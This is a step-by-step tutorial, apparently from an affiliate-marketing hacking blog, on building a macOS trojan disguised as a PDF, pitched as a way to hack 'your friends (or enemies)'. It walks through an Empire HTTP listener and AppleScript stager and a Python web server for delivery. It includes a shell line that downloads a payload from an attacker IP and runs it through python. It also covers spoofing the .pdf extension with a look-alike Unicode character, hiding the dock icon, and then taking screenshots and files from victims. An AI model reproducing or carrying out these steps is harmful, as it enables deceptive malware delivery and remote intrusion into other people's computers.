Note: If you do not have Kali Linux, you can buy a pre-made ready to boot USB with Kali Linux on it from here (Amazon). Any sales will support our content creators.

We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites.

In this article, we will be using Kali Linux to create a fake pdf that installs a trojan on a mac. If you don’t have Kali Linux but still want to hack your friends (or enemies), you can buy a USB with Kali Linux and instructions on how to install it on your computer right here.

A quick preview of what’s to come:

Part 1: Creating the listener and web server

Step 1: Install the listening tool

For those of you who have read other articles by us, you should be very familiar with Metasploit and how it can allow you to remotely access a trojan that you planted on some unsuspecting person’s computer. It also comes pre-installed on Kali, making it extra convenient. Instead of Metasploit, we’re going to use a different listening tool: Empire.

Empire is a framework similar to Metasploit in that it allows you to snoop around inside a network, oftentimes undetected. However, Empire is much more specialized, being used specifically for generating windows payloads. However, Empire can be used on Mac as well.

If you already have Empire, skip to step 2

To install Empire, simply type

git clone https://github.com/EmpireProject/Empire.git

Into the terminal. This tells Kali to go into a github repository and clones the code inside it (Git also comes pre-installed on all Kali USBs sold by the website listed above). After a few seconds, Empire will be installed.

Before we can use Empire, we need to set it up and install everything necessary.

Move into the Empire folder and then into the setup folder using cd, then install Empire by typing in

./install.sh

Eventually, you will be prompted to enter a password. I set it to “toor” due to tradition.

To run Empire, type in

cd ..

To get back to the previous directory, then type in

./empire

To start it up.

Step 1.5: Fixing any errors

It is very possible that when you try to run Empire, it will give you an import error like this one:

If this happens, don’t panic. Most of the time, you can fix this by doing a simple

sudo apt-get install python-[missing module name]

Or

pip install [missing module name]

Eventually, you will install everything necessary and get to this screen.

Step 2: Creating the listener

If you haven’t already, type in

./empire

While in the Empire directory to start the Empire program. Once in, type in

listeners

To tell Empire that we want to set up a listener. From there, we can type in

help

To see all the commands available to us

We can type in

uselistener http

To use an http listener, which will wait until it receives a signal over http to start up a shell on the target computer where we can poke around.

We can type in

info

To see the options set for this listener.

It is very important for the port to be set to 80 and the host to be set to 0.0.0.0. Port 80 is the port that is used for http traffic, and a host of 0.0.0.0 will allow the listener to get traffic from any IP address.

We can type

set Host 0.0.0.0

To set the host to 0.0.0.0. Similarly, we can type

set Port 80

To set the listening port to 80 if it isn’t already set there. We will then type

info

Again to see the changes.

Before

We are done with the setup. Type in

execute

To start up the listener.

If we type in

listeners

We see that our http listener is active.

Step 3: Create the stager

A stager is similar to a payload. When the exploit is executed on the victim’s computer, it links the payload back to the Empire session, allowing us to maneuver throughout the victim’s system.

Type in

usestager

And then press the tab key twice to list all available stagers

In this tutorial, we will be using applescript, as we will be hacking a mac os.

Type in

usestager osx/applescript

If we type in

info

We can see the information regarding this stager. We see that there is no listener given.

In order to set the listener to http, we simply type

set Listener http

And then type

info

To see the changes.

Type in

generate

To create the stager.

We see that a bash command is generated. We will copy this into a new file. This block of code is our trojan. We will copy this code and place it in the fake pdf.

Step 4: Save the trojan

Open up a new terminal window and type in

mkdir trojan_files

To create a new directory that holds all the files that will be important to this hack.

Then type

cd trojan_files

To enter that directory. We will create a file that contains the trojan code from the applescript stager.

Type in

nano trojan_script

To create the file

Right click and paste the trojan code into the file. Then type in ctrl-x and press ‘y’ to save the file.

To check that we did everything right, we can view the trojan code by typing in

cat trojan_script

If you followed all of the instructions, it should look like this picture below.

Step 5: Start the python web server

This web server allows anyone to download our trojan, but our intended target is the person who downloads the fake pdf. To start up the web server, open a new terminal window, make sure you are in the trojan_files directory, and type in

python3 -m http.server 8080 &

If we open up a browser window and type in our IP address and the port we used with the format [IP address]:[Port], we can see the file.

Part 2: Creating the pdf

We will be creating a real pdf for this exploit. This pdf will have a macro enabled so that it downloads our trojan every time the pdf is opened. It will connect to our python web server and download the trojan file that we have saved.

Step 1: Find the image and install GIMP

To create the pdf, search up the image that you’d like to send your victim and save it in your trojan_files directory.

Next, we want to install GIMP, which is a powerful photo editing tool. This will allow us to create our pdf. Simply type

sudo apt-get install gimp

to install it.

Next, we want to open up our image in GIMP. To do so, we type

gimp [picture_name].jpg

Step 2: Export the picture and edit the size In GIMP, we want to export the picture as a pdf, which can be done by clicking “file”, then “export as.” We can then rename the file and choose the type of file to export it to from the menu below. In this case, we want to export it to a pdf.

Apple icons are always perfect squares, so you may have to resize the image’s width or height so they are equal. To do this, simply go to Image and click on Canvas Size. We can now edit the size of the image. Make sure the fill with option has “transparency” selected.

Next, we want to scale the image. Click on “Image”, and then click on “Scale Image.” We want to scale the image to 256 x 256 pixels.

Finally, we want to export the jpg image as a png. This will allow us to easily convert the image to an icns file, which is used by apple to display images. This lends more credibility for our fake trojan. If you don’t want to export the image as a png for whatever reason, you can use cloudconvert to convert the image from a png file, you can convert the jpg file to a png file, and then to an icns file.

Go to https://cloudconvert.com/ to convert the image.

After it converts, download the image and move it from your downloads directory to your trojan_files directory using

cd ../Downloads mv image_copy.icns ../trojan_files/ cd ../trojan_files/

Once you are done, you should see the image copy in the trojan_files folder.

Step 3: Insert the shell script and edit the pdf

Now, we are going to switch over to using a mac so we can create applescripts to embed in our pdf.

In the “utilities” folder listed under “Applications,” we see the script editor program. This will allow us to create custom applescripts. We will use this to download our trojan from our python web server.

Open up the script editor, and type in

do shell script "s=[Attacker_IP]:[Web_server_port]; curl -s $s/[pdf_file] | open -f -a Preview.app & curl - s $s/[Name_of_Trojan_File] | python -"

The attacker IP and port are the ip address of your computer (the attacking computer), and the port that the python web server is on. Type in the same things you used to access the python web server after you created it.

We are going to save this script as an “Application” file (mac equivalent of a .exe file). Click “file”, then export.

I recommend saving it to the desktop so we can easily work with the applescript. Our goal is to make it look identical to the real pdf.

In order to change the display image of the trojan file, right click on the trojan and click “get info.” You will then be able to drag the icns file that we made and put that as the image.

Step 4: Make the trojan appear as innocent as possible

The next thing we want to do is add a .pdf extension to the end of the file. However, when we try to rename it with a .pdf at the end, the mac will add the .app extension at the end.

The best way to mitigate this is to use a unicode character that looks like a p, d, or f, but actually isn’t. I recommend using unicode character U+217E, the lowercase character for the roman numeral d. It looks almost identical to the letter d and I guarantee that no one will notice any difference.

The last thing that we might need to do is add a few lines to the plist document in the trojan. Sometimes, two windows will appear on the bottom dock when you open up the trojan pdf. That looks suspicious, as a normal pdf will only open one window when opened. However, we can fix this by adding these lines to the plist document.

<key>NSUIElement</key> <string>1</string>

Step 5: Poke around in your new shell

After the victim opens up the pdf with the trojan, we will see that Empire will respond with a new session.

From here, we can open up a new terminal and start Empire again. We will see that there are active agents.

We can type “agents” to navigate to the agents menu. From there, we can list our agents by typing

agents

and we can interact with our agents by typing

interact [agent_name]

If we type in

help

We can see the commands that are available to us, including the beloved ability to take a screenshot, but you can also do more advanced things like run a python script or download files.

Hopefully you now have a good understanding of how easy it can be to hack into a target system and cause a bit of mischief. If you want to try this out yourself, you can buy a live Kali Linux usb with installation instructions right here.